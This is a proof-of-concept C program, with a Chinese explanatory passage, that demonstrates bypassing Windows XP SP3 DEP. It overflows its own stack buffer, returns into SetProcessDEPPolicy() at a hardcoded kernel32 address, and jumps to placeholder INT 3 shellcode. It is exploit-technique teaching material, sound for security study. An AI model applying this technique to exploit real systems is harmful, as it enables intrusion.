[zz]DEP bypass with SetProcessDEPPolicy()

1. /*
2. This is a proof of concept of buffer overflow exploitation with DEP
3. bypass on Windows XP Professional SP3 english updated on December 9,
4. 2009 with DEP manually set to OptOut so enabled for all processes,
5. except the ones that are put in the exception list and this program
6. is not.
7.  
8. This source has been compiled with Microsoft Visual C++ 2008 Express
9. Edition in Release mode with the default flags. This includes
10. /NXCOMPAT and /GS.
11.  
12. Buffer Security Check (stack cookie, /GS flag) does not need to be
13. bypassed because the string buffer, buf, in this example is long
14. 4 bytes, so the compiler does not add the GS cookie to the
15. useSetProcessDEPPolicy() function. Remember that strict_gs_check
16. pragma by default is turned off.
17.  
18. References:
19. * 'New NX APIs added to Windows Vista SP1, Windows XP SP3 and Windows
20.   Server 2008' by Michael Howard,
21.   http://blogs.msdn.com/michael_howard/archive/2008/01/29/new-nx-apis-added-to-windows-vista-sp1-windows-xp-sp3-and-windows-server-2008.aspx
22. * SetProcessDEPPolicy Function,
23.   http://msdn.microsoft.com/en-us/library/bb736299%28VS.85%29.aspx
24.  
25. Feel free to write me for comments and questions,
26. Bernardo Damele A. G. <bernardo.damele@gmail.com>
27. */
28.  
29.  
30. #include <windows.h>
31. #include <stdlib.h>
32.  
33.  
34. void useSetProcessDEPPolicy()
35. {
36.     char buf[4];
37.  
38.     /* Overflow the string buffer and EBP register. */
39.     strcpy(buf, "AAAABBBB");
40.  
41.     /* SetProcessDEPPolicy() API has been added to Windows Vista SP1,
42.     Windows XP SP3 and Windows Server 2008 and can be abused by an
43.     attacker while exploiting a buffer overflow vulnerability to disable
44.     hardware-enforced DEP (NX/XD bit) for the running process.
45.  
46.     Overwrite EIP with the address of SetProcessDepPolicy() API, which
47.     is 0x7c8622a4 on a Windows XP SP3 English 32bit system updated on
48.     December 9, 2009.
49.  
50.     NOTE: You might need to adapt it depending on your system patch
51.     level. */
52.     memcpy(buf+8, "\xa4\x22\x86\x7c", 4);
53.  
54.     /* Return address of SetProcessDepPolicy().
55.     Use an address of a JMP ESP instruction in kernel32.dll to jump to our
56.     shellcode on the top of the stack.
57.  
58.     NOTE: You might need to adapt it depending on your system patch
59.     level. */
60.     memcpy(buf+12, "\x13\x44\x87\x7c", 4);
61.  
62.     /* Argument for SetProcessDepPolicy().
63.     0x00000000 turn off DEP for this process. */
64.     memcpy(buf+16, "\x00\x00\x00\x00", 4);
65.  
66.     /* The shellcode to be executed after DEP has been disabled.
67.     For instance, a breakpoint (INT 3 instruction) to call the
68.     debug exception handler which will pause the process. */
69.     memcpy(buf+20, "\xcc", 1);
70. }
71.  
72.  
73. int main()
74. {
75.     useSetProcessDEPPolicy();
76.  
77.     return 0;
78. }
     
    利用SetProcessDEPPolicy来关闭DEP
    适用在：Windows XP SP3，Vista SP1 和Windows 2008。
    为了能使这个函数有效，当前的DEP 策略必须设成OptIn 或者OptOut。如果策略被设成
    AlwaysOn（或者AlwaysOff），然后SetProcessDEPPolicy 将会抛出一个错误。如果一个模块
    是以/NXCOMPAT 链接的，这个技术也将不会成功。最后，同等重要的是，它这能被进程调
    用一次。因此如果这个函数已经被当前进程调用（如IE8，当程序开始时已经调用它），它
    将不成功。
    Bernardo Damele 写了一篇关于这一技术的博文：
    http://bernardodamele.blogspot.com/2009/12/dep-bypass-with-setprocessdeppolicy.html
    函数原型如下：
    BOOLWINAPI SetprocessDEPPolicy(
      __in DWORD dwFlags
    );
    这个函数需要一个参数，并且这个参数必须设置为0，以此禁用当前进程的DEP。
    为了在ROP 链中使用这个函数，你需要在栈上这样设置：
    ●指向SetProcessDEPPolicy 的指针
    ●指向shellcode 的指针
    ●0
    指向shellcode 的指针用于确保当SetProcessDEPPolicy()执行完ROP链后会跳到shellcode。
    在XP SP3 下SetProcessDEPPolicy 的地址是7C8622A4（kernel32.dll）
    http://bernardodamele.blogspot.com/2009/12/dep-bypass-with-setprocessdeppolicy.html